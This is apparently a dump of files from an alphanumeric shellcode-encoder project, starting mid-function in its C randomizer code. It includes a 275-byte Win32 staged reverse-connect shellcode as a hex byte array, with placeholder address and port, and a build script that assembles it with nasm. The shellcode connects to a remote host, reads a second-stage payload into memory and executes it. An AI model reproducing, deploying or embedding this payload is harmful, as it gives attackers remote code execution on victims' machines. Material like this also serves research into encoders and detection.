FindRandomizerIndex(Buffer[i]); if (Index < 0) { fprintf(stderr, "ERROR: invalid stub or decoder (unknown randomizer '%c')\n", Buffer[i]); return FALSE; } RandomizerLength = 1 + g_Randomizers[Index].Extra; if (ReplaceNextMatch && Buffer[i] == saved_key) { memcpy(Buffer+i, Buffer+saved_i, RandomizerLength); ReplaceNextMatch = FALSE; saved_i = 0; saved_key = 0; i += g_Randomizers[Index].Extra; } else { if (g_Randomizers[Index].ReplaceNextMatch) { ReplaceNextMatch = TRUE; saved_i = i; saved_key = Buffer[i]; } Randomize(Buffer+i, g_Randomizers[Index].CharacterSet, RandomizerLength); } } } return TRUE; } === enc2alnum/shellcode_samples/win32_stage_reverse_read.c BYTE HexDump[] = // 275 bytes "\x81\xe4\xfc\xff\xff\xff\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b" "\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b" "\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31" "\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24" "\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01" "\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08" "\x00\x5e\x6a\x30\x59\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b" "\x8b\x5b\x08\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00" "\x01\x00\x00\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00" "\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5" "\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18" "\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff" "\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37" "\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24" "\x89\xc7\x68\xaa\xbb\xcc\xdd\x68\x02\x00\xab\xcd\x89\xe1\x6a\x10" "\x51\x57\xff\x55\x20\x59\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a" "\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00" "\x00\xff\xd3"; === enc2alnum/shellcode_samples/make.bat @echo off del win32_stage_reverse_read.bin 2>NUL nasmw -f bin -o win32_stage_reverse_read.bin win32_stage_boot_reverse_read.asm hexdump -h -c win32_stage_reverse_read.bin > win32_stage_reverse_read.c echo Bin is win32_stage_reverse_read.bin echo C string is win32_stage_reverse_read.c === enc2alnum/shellcode_samples/win32_stage_api.asm Original by HDM, see www.metasploit.com === enc2alnum/shellcode_samples/win32_stage_boot_reverse.asm Original by HDM, see www.metasploit.com === enc2alnum/shellcode_samples/win32_stage_boot_reverse_read.asm Original by HDM, see www.metasploit.com